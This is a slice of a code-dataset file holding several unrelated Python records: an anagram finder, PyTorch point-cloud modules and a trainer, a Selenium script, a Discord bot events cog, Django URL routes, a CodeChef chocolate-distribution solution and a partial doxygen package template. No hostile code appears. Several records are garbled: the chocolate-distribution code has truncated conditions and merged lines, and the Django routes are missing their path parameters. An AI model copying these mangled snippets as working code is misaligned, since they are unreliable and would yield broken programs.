IOError:\n print(\"Error reading from file:\", filename)\n\n elif command == \"3\": # List words in BST\n for anagram in my_tree:\n string = \"\"\n for words in anagram[1]:\n string += str(words)+\", \"\n print(anagram[0]+\" = \"+string)\n print(\"Done!\")\n\n elif command == \"4\": # Search\n input_string = input(\"Search string: \").strip()\n if input_string.isalpha():\n sorted_string = \"\".join(sorted(input_string.lower()))\n print(\"Searching:\", input_string)\n # TODO: Add search code\n try: \n items = my_tree[sorted_string]\n except KeyError:\n print(\"Item could not be found. Returning to menu\")\n else:\n print(\"Item found!\")\n else:\n print(\"Error: please enter a good string\")\n\n elif command == \"5\": # Anagram\n input_string = input(\"Find anagrams of word: \").strip()\n if input_string.isalpha():\n sorted_string = \"\".join(sorted(input_string.lower()))\n print(\"Searching for anagrams of: \"+input_string)\n try:\n anagram_list = my_tree[sorted_string]\n if len(anagram_list) == 1: \n # if list found has only one element, then there must be no other anagrams\n raise KeyError\n except KeyError:\n print(\"No anagram found\")\n else:\n for word in anagram_list:\n if word is not input_string:\n print(word)\n print(\"Done!\")\n else:\n print(\"Error: please enter a good string\")\n\n elif command == \"6\": # Quit\n quit_program = True\n\n else:\n print(\"Human Error: unrecognised command number!\")\n\nif __name__ == '__main__':\n menu()\n","sub_path":"Anagram Finder/anagram.py","file_name":"anagram.py","file_ext":"py","file_size_in_byte":4241,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"477124893","text":"from abc import ABC, abstractmethod\nimport math\nfrom functools import partial\nimport torch\nfrom torch import nn\nfrom torch.nn import Sequential as Seq, Linear as Lin, ReLU, LeakyReLU, BatchNorm1d as BN, Dropout\nfrom torch_geometric.nn import knn_interpolate, fps, radius, global_max_pool, global_mean_pool, knn\nfrom torch_geometric.data import Batch\nfrom torch_geometric.utils import scatter_\nimport models.utils as utils \n\n\ndef copy_from_to(data, batch):\n for key in data.keys:\n if key not in batch.keys:\n setattr(batch, key, getattr(data, key, None))\n\n\ndef MLP(channels, activation=ReLU()):\n return Seq(*[\n Seq(Lin(channels[i - 1], channels[i]), activation, BN(channels[i]))\n for i in range(1, len(channels))\n ])\n\n################## BASE CONVOLUTION #####################\n\n\nclass BaseConvolution(ABC, torch.nn.Module):\n\n def __init__(self, sampler, neighbour_finder, *args, **kwargs):\n torch.nn.Module.__init__(self)\n\n self.sampler = sampler\n self.neighbour_finder = neighbour_finder\n\n\nclass BaseConvolutionDown(BaseConvolution):\n def __init__(self, sampler, neighbour_finder, *args, **kwargs):\n super(BaseConvolutionDown, self).__init__(sampler, neighbour_finder, *args, **kwargs)\n\n self._precompute_multi_scale = kwargs.get(\"precompute_multi_scale\", None)\n self._index = kwargs.get(\"index\", None)\n\n def conv(self, x, pos, edge_index, batch):\n raise NotImplementedError\n\n def forward(self, data):\n batch_obj = Batch()\n x, pos, batch = data.x, data.pos, data.batch\n if self._precompute_multi_scale:\n idx = getattr(data, \"idx_{}\".format(self._index), None)\n edge_index = getattr(data, \"edge_index_{}\".format(self._index), None)\n else:\n idx = self.sampler(pos, batch)\n row, col = self.neighbour_finder(pos, pos[idx], batch, batch[idx])\n edge_index = torch.stack([col, row], dim=0)\n batch_obj.idx = idx\n batch_obj.edge_index = edge_index\n\n batch_obj.x = self.conv(x, (pos, pos[idx]), edge_index, batch)\n batch_obj.pos = pos[idx]\n batch_obj.batch = batch[idx]\n copy_from_to(data, batch_obj)\n return batch_obj\n\n\nclass BaseConvolutionUp(BaseConvolution):\n def __init__(self, neighbour_finder, *args, **kwargs):\n super(BaseConvolutionUp, self).__init__(None, neighbour_finder, *args, **kwargs)\n\n self._precompute_multi_scale = kwargs.get(\"precompute_multi_scale\", None)\n self._index = kwargs.get(\"index\", None)\n self._skip = kwargs.get(\"skip\", True)\n\n def conv(self, x, pos, pos_skip, batch, batch_skip, edge_index):\n raise NotImplementedError\n\n def forward(self, data):\n batch_obj = Batch()\n data, data_skip = data\n x, pos, batch = data.x, data.pos, data.batch\n x_skip, pos_skip, batch_skip = data_skip.x, data_skip.pos, data_skip.batch\n\n if self.neighbour_finder is not None:\n if self._precompute_multi_scale: # TODO For now, it uses the one calculated during down steps\n edge_index = getattr(data_skip, \"edge_index_{}\".format(self._index), None)\n col, row = edge_index\n edge_index = torch.stack([row, col], dim=0)\n else:\n row, col = self.neighbour_finder(pos, pos_skip, batch, batch_skip)\n edge_index = torch.stack([col, row], dim=0)\n else:\n edge_index = None\n\n x = self.conv(x, pos, pos_skip, batch, batch_skip, edge_index)\n\n if x_skip is not None and self._skip:\n x = torch.cat([x, x_skip], dim=1)\n if hasattr(self, 'nn'):\n batch_obj.x = self.nn(x)\n else:\n batch_obj.x = x\n copy_from_to(data_skip, batch_obj)\n return batch_obj\n\n\nclass GlobalBaseModule(torch.nn.Module):\n def __init__(self, nn, aggr='max'):\n super(GlobalBaseModule, self).__init__()\n self.nn = MLP(nn)\n self.pool = global_max_pool if aggr == \"max\" else global_mean_pool\n\n def forward(self, data):\n batch_obj = Batch()\n x, pos, batch = data.x, data.pos, data.batch\n x = self.nn(torch.cat([x, pos], dim=1))\n x = self.pool(x, batch)\n batch_obj.x = x\n batch_obj.pos = pos.new_zeros((x.size(0), 3))\n batch_obj.batch = torch.arange(x.size(0), device=batch.device)\n copy_from_to(data, batch_obj)\n return batch_obj\n\n#################### COMMON MODULE ########################\n\n\nclass FPModule(BaseConvolutionUp):\n \"\"\" Upsampling module from PointNet++\n\n Arguments:\n k [int] -- number of nearest neighboors used for the interpolation\n up_conv_nn [List[int]] -- list of feature sizes for the uplconv mlp\n\n Returns:\n [type] -- [description]\n \"\"\"\n\n def __init__(self, up_k, up_conv_nn, nb_feature=None, **kwargs):\n super(FPModule, self).__init__(None)\n\n self.k = up_k\n self.nn = MLP(up_conv_nn)\n\n def conv(self, x, pos, pos_skip, batch, batch_skip, *args):\n return knn_interpolate(x, pos, pos_skip, batch, batch_skip, k=self.k)\n\n########################## BASE RESIDUAL DOWN #####################\n\n\nclass BaseResnetBlockDown(BaseConvolutionDown):\n\n def __init__(self, sampler, neighbour_finder, *args, **kwargs):\n super(BaseResnetBlockDown, self).__init__(sampler, neighbour_finder, *args, **kwargs)\n\n in_features, out_features, conv_features = kwargs.get(\"down_conv_nn\", None)\n\n self.in_features = in_features\n self.out_features = out_features\n self.conv_features = conv_features\n\n self.features_downsample_nn = MLP([self.in_features, self.conv_features])\n\n self.features_upsample_nn = MLP([self.conv_features, self.out_features])\n self.shortcut_feature_resize_nn = MLP([self.in_features, self.out_features])\n\n def convs(self, x, pos, edge_index):\n raise NotImplementedError\n\n def conv(self, x, pos, edge_index):\n shortcut = x\n x = self.features_downsample_nn(x)\n x, pos, edge_index, idx = self.convs(x, pos, edge_index)\n x = self.features_upsample_nn(x)\n if idx is not None:\n shortcut = shortcut[idx]\n shortcut = self.shortcut_feature_resize_nn(shortcut)\n x = shortcut + x\n return x\n\n\nclass BaseResnetBlock(ABC, torch.nn.Module):\n\n def __init__(self, indim, outdim, convdim):\n '''\n indim: size of x at the input\n outdim: desired size of x at the output\n convdim: size of x following convolution\n '''\n torch.nn.Module.__init__(self)\n\n self.indim = indim\n self.outdim = outdim\n self.convdim = convdim\n\n self.features_downsample_nn = MLP([self.indim, self.outdim//4])\n self.features_upsample_nn = MLP([self.convdim, self.outdim])\n\n self.shortcut_feature_resize_nn = MLP([self.indim, self.outdim])\n\n self.activation = ReLU()\n\n @property\n @abstractmethod\n def convs(self):\n pass\n\n def forward(self, data):\n batch_obj = Batch()\n x = data.x # (N, indim)\n shortcut = x # (N, indim)\n x = self.features_downsample_nn(x) # (N, outdim//4)\n # if this is an identity resnet block, idx will be None\n data = self.convs(data) # (N', convdim)\n x = data.x\n idx = data.idx\n x = self.features_upsample_nn(x) # (N', outdim)\n if idx is not None:\n shortcut = shortcut[idx] # (N', indim)\n shortcut = self.shortcut_feature_resize_nn(shortcut) # (N', outdim)\n x = shortcut + x\n batch_obj.x = x\n batch_obj.pos = data.pos\n batch_obj.batch = data.batch\n copy_from_to(data, batch_obj)\n return batch_obj\n","sub_path":"models/core_modules.py","file_name":"core_modules.py","file_ext":"py","file_size_in_byte":7798,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"410812213","text":"from selenium import webdriver\nfrom selenium.webdriver.common.by import By\n\n\n\ndriver=webdriver.Chrome()\ndriver.get('https://www.yhd.com')\na=driver.find_elements(By.CLASS_NAME,'bursting')\njs='window.scrollTo(0,1300)'\ndriver.execute_script(js)\nfor i in a :\n if i.get_attribute('clstag')=='pageclick|keycount|shouye_20181018|scenario3_sku4':\n i.click()\n\n","sub_path":"page/QQpage.py","file_name":"QQpage.py","file_ext":"py","file_size_in_byte":361,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"256221263","text":"import discord\nfrom discord.ext import commands, tasks\nimport helpers.log as log\nimport helpers.utilityfunctions as util\nfrom helpers import emojis\nimport data.database as db\nimport re\nimport random\nimport asyncio\n\nlogger = log.get_logger(__name__)\ncommand_logger = log.get_command_logger()\n\n\nclass Events(commands.Cog):\n def __init__(self, bot):\n self.bot = bot\n self.stfu_regex = re.compile(r\"(?:^|\\W){0}(?:$|\\W)\".format(\"stfu\"), flags=re.IGNORECASE)\n self.statuses = [\n (\"watching\", lambda: f\"{len(self.bot.guilds)} servers\"),\n (\"listening\", lambda: f\"{len(set(self.bot.get_all_members()))} users\"),\n (\"playing\", lambda: \"misobot.xyz\"),\n ]\n self.activities = {\"playing\": 0, \"streaming\": 1, \"listening\": 2, \"watching\": 3}\n self.current_status = None\n self.status_loop.start()\n self.guildlog = 652916681299066900\n\n def cog_unload(self):\n self.status_loop.cancel()\n\n @commands.Cog.listener()\n async def on_command_completion(self, ctx):\n \"\"\"Runs when any command is completed succesfully.\"\"\"\n # prevent double invocation for subcommands\n if ctx.invoked_subcommand is None:\n command_logger.info(log.log_command(ctx))\n db.log_command_usage(ctx)\n\n @commands.Cog.listener()\n async def on_ready(self):\n \"\"\"Runs when the bot connects to the discord servers.\"\"\"\n latencies = self.bot.latencies\n logger.info(f\"Loading complete | running {len(latencies)} shards\")\n for shard_id, latency in latencies:\n logger.info(f\"Shard [{shard_id}] - HEARTBEAT {latency}s\")\n\n @tasks.loop(minutes=3.0)\n async def status_loop(self):\n try:\n await self.next_status()\n except Exception as e:\n logger.error(e)\n\n @status_loop.before_loop\n async def before_status_loop(self):\n await self.bot.wait_until_ready()\n await asyncio.sleep(30) # avoid rate limit from discord in case of rapid reconnect\n logger.info(\"Starting status loop\")\n\n async def next_status(self):\n \"\"\"switch to the next status message.\"\"\"\n new_status_id = self.current_status\n while new_status_id == self.current_status:\n new_status_id = random.randrange(0, len(self.statuses))\n\n status = self.statuses[new_status_id]\n self.current_status = new_status_id\n\n await self.bot.change_presence(\n activity=discord.Activity(\n type=discord.ActivityType(self.activities[status[0]]), name=status[1]()\n )\n )\n\n @commands.Cog.listener()\n async def on_guild_join(self, guild):\n \"\"\"Called when bot joins a new guild.\"\"\"\n logger.info(f\"New guild : {guild}\")\n content = discord.Embed(color=discord.Color.green())\n content.title = \"New guild!\"\n content.description = (\n f\"Miso just joined **{guild}**\\nWith **{guild.member_count-1}** members\"\n )\n content.set_thumbnail(url=guild.icon_url)\n content.set_footer(text=f\"#{guild.id}\")\n logchannel = self.bot.get_channel(self.guildlog)\n await logchannel.send(embed=content)\n\n @commands.Cog.listener()\n async def on_guild_remove(self, guild):\n \"\"\"Called when bot leaves a guild.\"\"\"\n logger.info(f\"Left guild : {guild}\")\n content = discord.Embed(color=discord.Color.red())\n content.title = \"Left guild!\"\n content.description = (\n f\"Miso just left **{guild}**\\nWith **{guild.member_count-1}** members :(\"\n )\n content.set_thumbnail(url=guild.icon_url)\n content.set_footer(text=f\"#{guild.id}\")\n logchannel = self.bot.get_channel(self.guildlog)\n await logchannel.send(embed=content)\n\n @commands.Cog.listener()\n async def on_member_join(self, member):\n \"\"\"Called when a new member joins a guild.\"\"\"\n channel_id = db.get_setting(member.guild.id, \"welcome_channel\")\n if channel_id is not None:\n channel = member.guild.get_channel(channel_id)\n if channel is None:\n logger.warning(f\"Cannot welcome {member} to {member.guild.name} (invalid channel)\")\n else:\n message_format = db.get_setting(member.guild.id, \"welcome_message\")\n if message_format is None:\n message_format = \"Welcome **{username}** {mention} to **{server}**\"\n\n try:\n if db.get_setting(member.guild.id, \"welcome_embed\") == 0:\n await channel.send(\n util.create_welcome_without_embed(member, member.guild, message_format)\n )\n else:\n await channel.send(\n embed=util.create_welcome_embed(member, member.guild, message_format)\n )\n except discord.errors.Forbidden:\n pass\n\n # add autorole\n role = member.guild.get_role(db.get_setting(member.guild.id, \"autorole\"))\n if role is not None:\n try:\n await member.add_roles(role)\n except discord.errors.Forbidden:\n logger.error(\n f\"Trying to add autorole failed in {member.guild.name} (no permissions)\"\n )\n\n @commands.Cog.listener()\n async def on_member_ban(self, guild, user):\n \"\"\"Called when user gets banned from a server.\"\"\"\n channel_id = db.get_setting(guild.id, \"bans_channel\")\n if channel_id is None:\n return\n\n channel = guild.get_channel(channel_id)\n if channel is None:\n return logger.warning(\n f\"Cannot announce ban of {user} from {guild.name} (invalid channel)\"\n )\n\n try:\n await channel.send(f\":hammer: **{user}** (`{user.id}`) has just been banned\")\n except discord.errors.Forbidden:\n pass\n\n @commands.Cog.listener()\n async def on_member_remove(self, member):\n \"\"\"Called when member leaves a guild.\"\"\"\n channel_id = db.get_setting(member.guild.id, \"goodbye_channel\")\n if channel_id is None:\n return\n\n channel = member.guild.get_channel(channel_id)\n if channel is None:\n return logger.warning(\n f\"Cannot say goodbye to {member} from {member.guild.name} (invalid channel)\"\n )\n\n message_format = db.get_setting(member.guild.id, \"goodbye_message\")\n if message_format is None:\n message_format = \"Goodbye {mention} ( **{user}** )\"\n\n try:\n await channel.send(util.create_goodbye_message(member, member.guild, message_format))\n except discord.errors.Forbidden:\n pass\n\n @commands.Cog.listener()\n async def on_message_delete(self, message):\n \"\"\"Listener that gets called when any message is deleted.\"\"\"\n # ignore bots\n if message.author.bot:\n return\n\n # ignore DMs\n if message.guild is None:\n return\n\n # ignore empty messages\n if len(message.content) == 0 and len(message.attachments) == 0:\n return\n\n # ignored channels\n if (\n db.query(\n \"select * from deleted_messages_mask where channel_id = ?\", (message.channel.id,),\n )\n is not None\n ):\n return\n\n channel_id = db.get_setting(message.guild.id, \"deleted_messages_channel\")\n if channel_id is None:\n return\n\n channel = message.guild.get_channel(channel_id)\n if channel is None or message.channel == channel:\n return\n\n try:\n await channel.send(embed=util.message_embed(message))\n except discord.errors.Forbidden:\n pass\n\n @commands.Cog.listener()\n async def on_message(self, message):\n \"\"\"Listener that gets called on every message.\"\"\"\n # make sure cache is ready\n if not self.bot.is_ready:\n return\n\n # ignore DMs\n if message.guild is None:\n return\n\n # votechannels\n\n data = db.query(\n \"\"\"SELECT channeltype FROM votechannels\n WHERE guild_id = ? and channel_id = ?\"\"\",\n (message.guild.id, message.channel.id),\n )\n if data is not None:\n if data[0][0] == \"rating\":\n for e in [\"0️⃣\", \"1️⃣\", \"2️⃣\", \"3️⃣\", \"4️⃣\", \"5️⃣\"]:\n await message.add_reaction(e)\n else:\n await message.add_reaction(emojis.UPVOTE)\n await message.add_reaction(emojis.DOWNVOTE)\n\n # xp gain\n message_xp = util.xp_from_message(message)\n currenthour = message.created_at.hour\n db.add_activity(message.guild.id, message.author.id, message_xp, currenthour)\n\n # if bot account, ignore everything after this\n if message.author.bot:\n return\n\n if db.get_setting(message.guild.id, \"autoresponses\") == 1:\n await self.easter_eggs(message)\n\n # log emojis\n unicode_emojis = util.find_unicode_emojis(message.content)\n custom_emojis = util.find_custom_emojis(message.content)\n if unicode_emojis or custom_emojis:\n db.log_emoji_usage(message, custom_emojis, unicode_emojis)\n\n # level up message\n announce = db.get_setting(message.guild.id, \"levelup_toggle\")\n if announce != 0:\n activity_data = db.get_user_activity(message.guild.id, message.author.id)\n if activity_data is None:\n return\n\n xp = sum(activity_data)\n level_before = util.get_level(xp - message_xp)\n level_now = util.get_level(xp)\n\n if level_now > level_before:\n try:\n await message.channel.send(\n f\"{message.author.mention} just leveled up! (level **{level_now}**)\",\n delete_after=5,\n )\n except discord.errors.Forbidden:\n pass\n\n async def easter_eggs(self, message):\n \"\"\"Easter eggs handler.\"\"\"\n # stfu\n if self.stfu_regex.findall(message.content) and random.randint(0, 1) == 0:\n try:\n await message.channel.send(\"no u\")\n except discord.errors.Forbidden:\n pass\n\n stripped_content = message.content.lower().strip(\"!.?~ \")\n\n # hi\n if stripped_content == \"hi\" and random.randint(0, 19) == 0:\n try:\n await message.channel.send(\"hi\")\n except discord.errors.Forbidden:\n pass\n\n # hello there\n elif stripped_content == \"hello there\" and random.randint(0, 2) == 0:\n try:\n await message.channel.send(\"General Kenobi\")\n except discord.errors.Forbidden:\n pass\n\n # git gud\n if message.content.lower().startswith(\"git \"):\n gitcommand = re.search(r\"git (\\S+)\", message.content)\n if gitcommand is None:\n return\n gitcommand = gitcommand.group(1)\n if gitcommand == \"--help\":\n msg = (\n \"```\\n\"\n \"usage: git [--version] [--help] [-C ] [-c =]\\n\"\n \" [--exec-path[=]] [--html-path] [--man-path] [--info-path]\\n\"\n \" [-p | --paginate | --no-pager] [--no-replace-objects] [--bare]\\n\"\n \" [--git-dir=] [--work-tree=] [--namespace=]\\n\"\n \" []```\"\n )\n elif gitcommand == \"--version\":\n msg = \"`git version 2.17.1`\"\n elif gitcommand in [\n \"commit\",\n \"push\",\n \"pull\",\n \"checkout\",\n \"status\",\n \"init\",\n \"add\",\n ]:\n return\n else:\n msg = f\"`git: '{gitcommand}' is not a git command. See 'git --help'.`\"\n\n try:\n await message.channel.send(msg)\n except discord.errors.Forbidden:\n pass\n\n @commands.Cog.listener()\n async def on_raw_reaction_add(self, payload):\n \"\"\"Starboard event handler.\"\"\"\n starboard_settings = db.query(\n \"\"\"\n SELECT starboard_toggle, starboard_amount, starboard_channel, starboard_emoji, starboard_emoji_is_custom\n FROM guilds WHERE guild_id = ?\"\"\",\n (payload.guild_id,),\n )\n if starboard_settings is None:\n return\n else:\n starboard_settings = starboard_settings[0]\n\n if not util.int_to_bool(starboard_settings[0]):\n return\n\n custom_emoji = False\n if starboard_settings[3] is None:\n star_emoji = \"⭐\"\n else:\n star_emoji = starboard_settings[3]\n if starboard_settings[4] == 1:\n custom_emoji = True\n\n is_correct = False\n if custom_emoji and payload.emoji.id == int(star_emoji):\n is_correct = True\n elif payload.emoji.name == star_emoji:\n is_correct = True\n\n if is_correct:\n channel = self.bot.get_channel(payload.channel_id)\n if channel.id == starboard_settings[2]:\n # trying to star a starboard message\n return\n\n message = await channel.fetch_message(payload.message_id)\n for react in message.reactions:\n if custom_emoji:\n if (\n isinstance(react.emoji, (discord.Emoji, discord.PartialEmoji))\n and react.emoji.id == payload.emoji.id\n ):\n reaction_count = react.count\n break\n else:\n if react.emoji == payload.emoji.name:\n reaction_count = react.count\n break\n\n if reaction_count < starboard_settings[1]:\n return\n\n channel_id = starboard_settings[2]\n channel = payload.member.guild.get_channel(channel_id)\n if channel is None:\n return\n\n board_msg_id = db.query(\n \"\"\"SELECT starboard_message_id FROM starboard WHERE message_id = ?\"\"\",\n (payload.message_id,),\n )\n reaction_emoji = star_emoji if not custom_emoji else \"⭐\"\n\n board_message = None\n if board_msg_id is not None:\n board_msg_id = board_msg_id[0][0]\n if board_msg_id is not None:\n try:\n board_message = await channel.fetch_message(board_msg_id)\n except discord.errors.NotFound:\n board_message = None\n\n if board_message is None:\n # message is not on board yet, or it was deleted\n content = discord.Embed(color=discord.Color.gold())\n content.set_author(name=f\"{message.author}\", icon_url=message.author.avatar_url)\n jump = f\"\\n\\n[context]({message.jump_url})\"\n content.description = message.content[: 2048 - len(jump)] + jump\n content.timestamp = message.created_at\n content.set_footer(\n text=f\"{reaction_count} {reaction_emoji} #{message.channel.name}\"\n )\n if len(message.attachments) > 0:\n content.set_image(url=message.attachments[0].url)\n\n try:\n board_message = await channel.send(embed=content)\n db.execute(\n \"REPLACE INTO starboard VALUES(?, ?)\",\n (payload.message_id, board_message.id),\n )\n except discord.errors.Forbidden:\n logger.warning(\n f\"Unable to send message to starboard in {channel.guild} due to missing permissions!\"\n )\n\n else:\n # message is on board, update star count\n content = board_message.embeds[0]\n content.set_footer(\n text=f\"{reaction_count} {reaction_emoji} #{message.channel.name}\"\n )\n await board_message.edit(embed=content)\n\n\ndef setup(bot):\n bot.add_cog(Events(bot))\n","sub_path":"cogs/events.py","file_name":"events.py","file_ext":"py","file_size_in_byte":16632,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"476683235","text":"from django.urls import path\nfrom . import views\n\napp_name = 'inventory'\n\nurlpatterns = [\n path(\"\", views.item_list, name=\"item_list\"),\n # path(\"amount/\", views.amount_ajax, name=\"amount_ajax\"),\n path(\"/\", views.item_read, name=\"item_read\"),\n path(\"create/\", views.item_create, name=\"item_create\"),\n path(\"update//\", views.item_update, name=\"item_update\"),\n path(\"delete//\", views.item_delete, name=\"item_delete\"),\n\npath(\"account/\", views.account_list, name=\"account_list\"),\n path(\"account//\", views.account_read, name=\"account_read\"),\n path(\"account/create/\", views.account_create, name=\"account_create\"),\n path(\"account/update//\", views.account_update, name=\"account_update\"),\n path(\"account/delete//\", views.account_delete, name=\"account_delete\"),\n]","sub_path":"inventory/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":830,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"142533922","text":"import time\nimport torch\nimport torch.nn as nn\nimport torch.optim as optim\nfrom copy import deepcopy\nimport numpy as np\nimport numpy.ma as ma\nimport pickle as pkl\nfrom sklearn.metrics import mean_absolute_error\nfrom scipy.stats import pearsonr\nfrom sklearn.metrics import mean_squared_error\nfrom math import sqrt\n\n\nclass Trainer:\n def __init__(self, num_epochs, early_stop_tolerance, clip, optimizer,\n learning_rate, weight_decay, momentum, device):\n\n self.num_epochs = num_epochs\n self.clip = clip\n self.optimizer = optimizer\n self.momentum = momentum\n self.weight_decay = weight_decay\n self.learning_rate = learning_rate\n self.tolerance = early_stop_tolerance\n self.device = torch.device(device)\n self.criterion = nn.MSELoss()\n\n def fit(self, model, batch_generator):\n\n model = model.to(self.device)\n model.train()\n\n if model.is_trainable:\n\n if self.optimizer == \"adam\":\n optimizer = optim.Adam(model.parameters(),\n lr=self.learning_rate)\n else:\n\n optimizer = optim.SGD(model.parameters(),\n lr=self.learning_rate,\n momentum=self.momentum)\n else:\n optimizer = None\n\n lr_scheduler = optim.lr_scheduler.ReduceLROnPlateau(optimizer, mode=\"min\", factor=0.5, patience=4)\n\n train_loss = []\n val_loss = []\n tolerance = 0\n best_val_loss = 1e6\n best_epoch = 0\n evaluation_val_loss = best_val_loss\n best_dict = model.state_dict()\n\n for epoch in range(self.num_epochs):\n # train and validation loop\n start_time = time.time()\n\n # train\n running_train_loss = self.__step_loop(model=model,\n generator=batch_generator,\n mode='train',\n optimizer=optimizer)\n\n # validation\n running_val_loss = self.__step_loop(model=model,\n generator=batch_generator,\n mode='val',\n optimizer=None)\n\n lr_scheduler.step(running_val_loss)\n\n epoch_time = time.time() - start_time\n\n message_str = \"\\nEpoch: {}, Train_loss: {:.5f}, Validation_loss: {:.5f}, Took {:.3f} seconds.\"\n print(message_str.format(epoch + 1, running_train_loss, running_val_loss, epoch_time))\n\n # save the losses\n train_loss.append(running_train_loss)\n val_loss.append(running_val_loss)\n\n if running_val_loss < best_val_loss:\n best_epoch = epoch + 1\n best_val_loss = running_val_loss\n best_dict = deepcopy(model.state_dict())\n tolerance = 0\n else:\n tolerance += 1\n\n if tolerance > self.tolerance or epoch == self.num_epochs - 1:\n model.load_state_dict(best_dict)\n\n evaluation_val_loss = self.__step_loop(model=model,\n generator=batch_generator,\n mode='val',\n optimizer=None)\n\n message_str = \"Early exiting from epoch: {}, Validation error: {:.5f}.\"\n print(message_str.format(best_epoch, evaluation_val_loss))\n break\n\n torch.cuda.empty_cache()\n\n print('Train finished, best eval lost: {:.5f}'.format(evaluation_val_loss))\n return train_loss, val_loss, evaluation_val_loss\n\n def transform(self, model, batch_generator):\n\n test_loss = self.__step_loop(model=model,\n generator=batch_generator,\n mode='test',\n optimizer=None,\n )\n print('Test finished, best eval lost: {:.5f}'.format(test_loss))\n\n return test_loss\n\n def __step_loop(self, model, generator, mode, optimizer):\n running_loss = 0\n batch_size = generator.dataset_params['batch_size']\n\n if mode in ['test', 'val']:\n step_fun = self.__val_step\n else:\n step_fun = self.__train_step\n idx = 0\n\n for idx, (x, y, f_x) in enumerate(generator.generate(mode)):\n print('\\r{}:{}/{}'.format(mode, idx, generator.num_iter(mode)),flush=True, end='')\n\n if hasattr(model, 'hidden'):\n hidden = model.init_hidden(batch_size)\n else:\n hidden = None\n\n x, y = [self.__prep_input(i) for i in [x, y]]\n\n loss = step_fun(model=model,\n inputs=[x, y, f_x.float().to(self.device), hidden],\n optimizer=optimizer,\n generator=generator,\n )\n running_loss += loss\n\n return running_loss\n\n def __train_step(self, model, inputs, optimizer, generator):\n\n x, y, f_x, hidden = inputs\n\n pred = model.forward(x=x, f_x=f_x, hidden=hidden)\n loss = self.criterion(pred, y)\n\n if model.is_trainable:\n loss.backward()\n nn.utils.clip_grad_norm_(model.parameters(), self.clip)\n optimizer.step()\n\n if generator.normalizer:\n pred = generator.normalizer.inv_norm(pred, self.device)\n\n y = generator.normalizer.inv_norm(y, self.device)\n\n de_norm_loss = self.criterion(pred, y)\n de_norm_loss = de_norm_loss.detach().cpu().numpy()\n loss = loss.detach().cpu().numpy()\n print(f\" loss: {de_norm_loss}\")\n\n return de_norm_loss\n\n def __val_step(self, model, inputs, optimizer, generator):\n\n x, y, f_x, hidden = inputs\n pred = model.forward(x=x, f_x=f_x, hidden=hidden)\n if generator.normalizer:\n pred = generator.normalizer.inv_norm(pred, self.device)\n y = generator.normalizer.inv_norm(y, self.device)\n loss = self.criterion(pred, y)\n return loss.detach().cpu().numpy()\n\n def __prep_input(self, x):\n x = x.float().to(self.device)\n # (b, t, m, n, d) -> (b, t, d, m, n)\n x = x.permute(0, 1, 4, 2, 3)\n return x\n","sub_path":"trainer.py","file_name":"trainer.py","file_ext":"py","file_size_in_byte":6554,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"303454812","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Wed Feb 10 10:18:09 2021\r\n\r\n@author: Parvish\r\n\"\"\"\r\n\r\n# Code Chef Challenge - CHEFMAS\r\n\r\nfrom itertools import permutations \r\n\r\ndef unique(l):\r\n unique_list = []\r\n for x in l:\r\n if x not in unique_list:\r\n unique_list.append(x)\r\n return unique_list\r\n\r\ndef recursiveDistribution(ls,maxSweets,current_values,flag,sweets,temp_values,distribution):\r\n if(len(ls[flag:])>1):\r\n for i in ls[flag:flag+1]:\r\n test_values=temp_values[:]\r\n for k in range(maxSweets,0,-1):\r\n if sum(current_values)1:\r\n for j in i[flag:flag+1]:\r\n for k in range(maxSweets,0,-1):\r\n if sum(current_values)100:\r\n raise Exception('Test cases should be between 0 to 100')\r\n output=[]\r\n for i in range(0,tc):\r\n \r\n sweets,children=input().split(' ')\r\n children=int(children)\r\n sweets=int(sweets)\r\n\r\n if((children<1 or children>sweets or children>pow(10,5)) or (sweets<1 or sweets>pow(10,5))):\r\n raise Exception('Children and sweets must be in following format, 1<=children<=sweets<=10^5')\r\n \r\n ac_list=input().split(' ',maxsplit=children)\r\n \r\n if len(ac_list)>children:\r\n ac_list.pop(children)\r\n \r\n ac_list = [int(i) for i in ac_list] \r\n \r\n for i in ac_list:\r\n if i>pow(10,5) or i<0:\r\n raise Exception('Goodness count must be between 0 to 10^5')\r\n \r\n if sum(ac_list)>sweets:\r\n output.append(0)\r\n \r\n elif sum(ac_list)==sweets:\r\n output.append(1)\r\n \r\n else:\r\n current_values=ac_list[:]\r\n distribution=[]\r\n index_combination=[]\r\n indexes=[idx for idx,val in enumerate(current_values)]\r\n \r\n for i in range(1,len(current_values)+1):\r\n perm = permutations(indexes, i)\r\n for i in list(perm):\r\n index_combination.append(i)\r\n\r\n recursiveDistributionCaller(index_combination,sweets,current_values,distribution,ac_list)\r\n distributed_probability=unique(distribution)\r\n output.append(len(distributed_probability))\r\n \r\n for i in output:\r\n print(i)\r\n \r\n except Exception as e:\r\n print(e)\r\n \r\nmain()","sub_path":"chocolate-distribution-problem.py","file_name":"chocolate-distribution-problem.py","file_ext":"py","file_size_in_byte":3913,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"361029494","text":"pkgname = \"doxygen\"\npkgver = \"1.9.7\"\npkgrel = 0\nbuild_style = \"cmake\"\nhostmakedepends = [\"cmake\", \"ninja\", \"perl\", \"python\", \"flex\", \"bison\"]\ncheckdepends = [\"libxml2-progs\"]\npkgdesc = \"Source code documentation generator tool\"\nmaintainer = \"q66 \"\nlicense = \"GPL-2.0-only\"\nurl = \"https://doxygen.nl\"\nsource = f\"{url}/files/{pkgname}-{pkgver}.src.tar.gz\"\nsha256 = \"87007641c38e2c392c8596f36711eb97633b984c8430f389e7bcf6323a098d94\"\nhardening = [\"vis\", \"cfi\"]\n\n\ndef post_extract(self):\n # needs texlive stuff\n self.rm(\"testing/012_cite.dox\")\n\n\ndef post_install(self):\n 